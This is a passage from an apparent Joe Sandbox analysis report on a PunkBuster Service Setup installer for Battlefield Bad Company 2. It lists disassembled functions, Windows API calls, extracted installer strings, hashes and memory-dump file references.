                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String$AllocFreeH_prolog
                                              • String ID: Message$SysAllocString failed: 0x%08lx$get_AuthorizedApplications failed: 0x%08lx$get_Enabled failed: 0x%08lx
                                              • API String ID: 1061292655-104412183
                                              • Opcode ID: 691445288035ba92857fa2f194e939a569db9ae7efce4dbcbc8219a4a60ad1d2
                                              • Instruction ID: 08d0d689e4b1c90c8307d53243ab566afb64f0a8895c35ba328b35e1111ee248
                                              • Opcode Fuzzy Hash: 691445288035ba92857fa2f194e939a569db9ae7efce4dbcbc8219a4a60ad1d2
                                              • Instruction Fuzzy Hash: 4651CF7090014AAFCB00EF95CC85EAEBBB8AF08314F60466DF516B72D1D7789E44CB65
                                              Function 00438010 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 214COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExA.USER32(00000000,BUTTON,?,?,00000000,00000000,00000000,00000000,?,FFFFFF37,00000000,00000000), ref: 00438163
                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 0043818B
                                              • SetWindowLongA.USER32(00000000,000000FC,00437AD0), ref: 0043819E
                                              • SetWindowLongA.USER32(00000000,000000EB), ref: 004381A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$Long$Create
                                              • String ID: BUTTON
                                              • API String ID: 1733017098-3405671355
                                              • Opcode ID: 6c3bf0fd82592f3ce33d0156255dc22ed68ef4fecfa262555431378655de1657
                                              • Instruction ID: 5eb1fe1e349d0c2bf26a2ea382cf1488185d3080d212b75d548425cf7d1e2c38
                                              • Opcode Fuzzy Hash: 6c3bf0fd82592f3ce33d0156255dc22ed68ef4fecfa262555431378655de1657
                                              • Instruction Fuzzy Hash: BD718CB1244301AFD314DF69DC81FABB7E9BB88710F10461EF55997391DB78A801CB69
                                              Function 00409D8D Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 171COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00409D9D
                                                • Part of subcall function 004092B5: __EH_prolog.LIBCMT ref: 004092BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$Installing$PunkBuster Service Setup v%d.%d %s - Step 2 of 2 - %s$PunkBuster Service Setup v%d.%d %s - Step 3 of 3 - %s$Un-installing
                                              • API String ID: 3519838083-4248269577
                                              • Opcode ID: 47b21bcafda829a2fb58cab40aa02b5fde0f793797ae0bb3dd78f86cf4abb4ca
                                              • Instruction ID: 78eb83f452c0a5ae38286d43f464178ba804fbe3ee9df3c1ff42f644fb56a5a3
                                              • Opcode Fuzzy Hash: 47b21bcafda829a2fb58cab40aa02b5fde0f793797ae0bb3dd78f86cf4abb4ca
                                              • Instruction Fuzzy Hash: A0719F70A002499FDB20DF64C894BEAB7F5AF49304F4440BEE149A72E3DB791E84CB59
                                              Function 004930A0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
                                              Download Yara Rule
                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004930C2
                                              • __allrem.LIBCMT ref: 00493163
                                              • __allrem.LIBCMT ref: 00493211
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00493232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID: gfff
                                              • API String ID: 1992179935-1553575800
                                              • Opcode ID: 909063c54548ab0acba61d0d3cc2af11cb58f79ae02012acdd2ebfa6cf058626
                                              • Instruction ID: 8483a46b589cb985f3b50d97f83bcfce0800402eec219d4dcdb42ed114fc504e
                                              • Opcode Fuzzy Hash: 909063c54548ab0acba61d0d3cc2af11cb58f79ae02012acdd2ebfa6cf058626
                                              • Instruction Fuzzy Hash: BB71E5727143108BCB18CF19DC41A2BBBD6AFD5314F49893EF445CB3A1E678EA098796
                                              Function 00402D90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004076BA: __EH_prolog.LIBCMT ref: 004076BF
                                                • Part of subcall function 004076BA: GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 0040770C
                                                • Part of subcall function 004076BA: _strncat.LIBCMT ref: 00407786
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00402DE6
                                              • CloseServiceHandle.ADVAPI32(?), ref: 00402DEE
                                              • GetLastError.KERNEL32 ref: 00402DF0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService_strncat$DirectoryErrorH_prologLastSystem
                                              • String ID: ERROR$Failed to start PnkBstrA service
                                              • API String ID: 2671922418-177627567
                                              • Opcode ID: ec03abff27e189f0570cde6ee349a6b5db4ab6f28ff478a2f9be88eaa58b738d
                                              • Instruction ID: 01776ab97a73c0c806ad562cde7058c9eb851f531a22512e06677a1d816b8581
                                              • Opcode Fuzzy Hash: ec03abff27e189f0570cde6ee349a6b5db4ab6f28ff478a2f9be88eaa58b738d
                                              • Instruction Fuzzy Hash: D0F090355007449FCB11AB61DC45CEA77B2FF88750F1044EDF14A9A1A0CB352A80CF05
                                              Function 0040902D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040903F
                                              • GetProcAddress.KERNEL32(00000000), ref: 00409046
                                              • GetCurrentProcess.KERNEL32(00000000), ref: 00409059
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressCurrentHandleModuleProcProcess
                                              • String ID: IsWow64Process$kernel32
                                              • API String ID: 4190356694-3789238822
                                              • Opcode ID: 4d39c8669cf566aea2a0cfb047afcbf8134d52e3e86177dd4aa2fb2500acd86a
                                              • Instruction ID: b2889b05f1dad1e2f3c50c1bb822b6e8b82adfdb205b460a6e2e4a438975ea47
                                              • Opcode Fuzzy Hash: 4d39c8669cf566aea2a0cfb047afcbf8134d52e3e86177dd4aa2fb2500acd86a
                                              • Instruction Fuzzy Hash: 99E04F74941348EBEB40DFB1DC4DB8977ACEB04706F200065B501E25A1D7789A448B18
                                              Function 004C5C2A Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,004BD355,?), ref: 004C5CDD
                                              • InterlockedExchange.KERNEL32(006E5828,00000001), ref: 004C5D5B
                                              • InterlockedExchange.KERNEL32(006E5828,00000000), ref: 004C5DC0
                                              • InterlockedExchange.KERNEL32(006E5828,00000001), ref: 004C5DE4
                                              • InterlockedExchange.KERNEL32(006E5828,00000000), ref: 004C5E44
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlocked$QueryVirtual
                                              • String ID:
                                              • API String ID: 2947987494-0
                                              • Opcode ID: 0997a2d5fa3fa2299e1212705d19e1cf62f61f8327e0e6827bbd249c09d78027
                                              • Instruction ID: d4fd967b9ef2ddb5f493da4d0830cd1fabe8dda03b298e9488f7d68cad15bcae
                                              • Opcode Fuzzy Hash: 0997a2d5fa3fa2299e1212705d19e1cf62f61f8327e0e6827bbd249c09d78027
                                              • Instruction Fuzzy Hash: C951C238A00F518FDFA48B58D8C4F6E73A5EB41714F64812FD4129B2A5D778F9C28A48
                                              Function 004BF798 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb2e1ef7f134cbd150f3a8f1cad5c3c71ba5ec4d18e13d1a1c7ae3d541101f7a
                                              • Instruction ID: 06e022bca2f044a232651a0051462ae43df652e2cdae1c6bcfd5a88350d1bcd9
                                              • Opcode Fuzzy Hash: bb2e1ef7f134cbd150f3a8f1cad5c3c71ba5ec4d18e13d1a1c7ae3d541101f7a
                                              • Instruction Fuzzy Hash: BD41B1B5C00265AACF20BF769C84AEF7A64EB41728710413FF919A62A1D73C4D458BBD
                                              Function 0040D2B8 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 272COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040D2BD
                                                • Part of subcall function 0040906B: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,0040D2D4,64-bit,00000000), ref: 004090A6
                                                • Part of subcall function 0040906B: CheckTokenMembership.ADVAPI32(00000000,?,0040D2D4,?,0040D2D4,64-bit,00000000,00000000), ref: 004090BB
                                                • Part of subcall function 0040906B: FreeSid.ADVAPI32(?,?,0040D2D4,64-bit,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004090CB
                                              Strings
                                              • Message, xrefs: 0040D2E5
                                              • 64-bit, xrefs: 0040D2C9
                                              • **ERROR: Since this program needs to install a system service, it must be run as Administrator. If you need assistance with this, please visit our FAQ page at: http://www.evenbalance.com/index.php?page=pbsvcfaq.php, xrefs: 0040D2F2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateCheckFreeH_prologInitializeMembershipToken
                                              • String ID: **ERROR: Since this program needs to install a system service, it must be run as Administrator. If you need assistance with this, please visit our FAQ page at: http://www.evenbalance.com/index.php?page=pbsvcfaq.php$64-bit$Message
                                              • API String ID: 823383314-662163179
                                              • Opcode ID: d7a69150156cd50d1c04ccd039bb8ec0c02a260cf596ffd9b276cb661914f2ea
                                              • Instruction ID: 480cf2e0fd4845596181bfe692aa14e385947aba559717c7c60188e3466bd68c
                                              • Opcode Fuzzy Hash: d7a69150156cd50d1c04ccd039bb8ec0c02a260cf596ffd9b276cb661914f2ea
                                              • Instruction Fuzzy Hash: 6EC16D70A00245DFDB10DFA4C888BEEBBE1AF49304F5444BEE84AAB3D2CB795945CB55
                                              Function 004070CD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004070D2
                                                • Part of subcall function 00406A55: __EH_prolog.LIBCMT ref: 00406A5A
                                                • Part of subcall function 0040A632: __EH_prolog.LIBCMT ref: 0040A637
                                              Strings
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 3, xrefs: 004071A4
                                              • frame, xrefs: 004070E6
                                              • Battlefield Bad Company 2, xrefs: 00407193
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
